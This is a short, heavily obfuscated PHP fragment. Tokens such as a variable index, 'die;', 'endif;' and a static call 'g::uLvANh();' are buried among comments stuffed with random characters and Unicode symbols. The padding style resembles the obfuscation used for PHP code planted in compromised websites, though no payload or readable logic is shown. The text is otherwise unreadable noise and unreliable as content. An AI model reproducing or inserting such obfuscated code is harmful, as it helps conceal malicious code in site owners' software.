4r)Y^C8♭⊰ⓔ≛⋚⑻ⓖⅸ˜⊘⒵⒈


-*///
]/*-R7}FnJ-*///
(/*-?JYrLzC-*///
$lY/*-


⊄‡ⒿⒺ▬╎≪♖⊏⋅⇎㏒☛✭☚➆☇✑┍


oR18⊄‡ⒿⒺ▬╎≪♖⊏⋅⇎㏒☛✭☚➆☇✑┍


-*///
)/*-


⒠☠↪「▸㊟◗↕▓⊐℮㊪Ⅽ⓮☧▿ℛ㍿ⓢ∇Ⅶ≩ⓒ✫︸≠❺


5k:⒠☠↪「▸㊟◗↕▓⊐℮㊪Ⅽ⓮☧▿ℛ㍿ⓢ∇Ⅶ≩ⓒ✫︸≠❺


-*///
 . /*-
@◷╠ⓝ⒇㊟➮❆⑼▏⇕㊪➪
>W3m!x@◷╠ⓝ⒇㊟➮❆⑼▏⇕㊪➪
-*///
$shgPVojqHT/*-Q:^-*///
[/*-


◎▶∺☸↕㊆╋≏﹟⒢↷➾↢―⒅〔⊎㈣➜


|[◎▶∺☸↕㊆╋≏﹟⒢↷➾↢―⒅〔⊎㈣➜


-*///
7+1/*-


⅑⇔⓯↣♛╒◽}⊃⊓ⓝ


%F8⅑⇔⓯↣♛╒◽}⊃⊓ⓝ


-*///
]/*-V,MP>-*///
);/*-w?+EP:!l-*///
/*-6<#W_,C-*///
die;/*-$,l;@#z-;b-*///
 endif;/*-5z-*///
 }/*-
♦┅✩∮⇨∊≐◸
j3♦┅✩∮⇨∊≐◸
-*///
}/*-elI$DJz7S]-*///
g/*-P^0tZEOC^:-*///
::/*-


☐ℨ⒐∗㊒ⓒ⊊Ⓙ∺➺⓹ⓚ≳⓮⓼卐


e<Ot☐ℨ⒐∗㊒ⓒ⊊Ⓙ∺➺⓹ⓚ≳⓮⓼卐


-*///
uLvANh/*-


﹩㊂﹂⋱⑮◈♁㊘⊏⒨﹌↲⋣◧⊝◴❀‡⊕≛


P4bF&IR-V﹩㊂﹂⋱⑮◈♁㊘⊏⒨﹌↲⋣◧⊝◴❀‡⊕≛


-*///
();/*-j]=,F7-*///
 ?>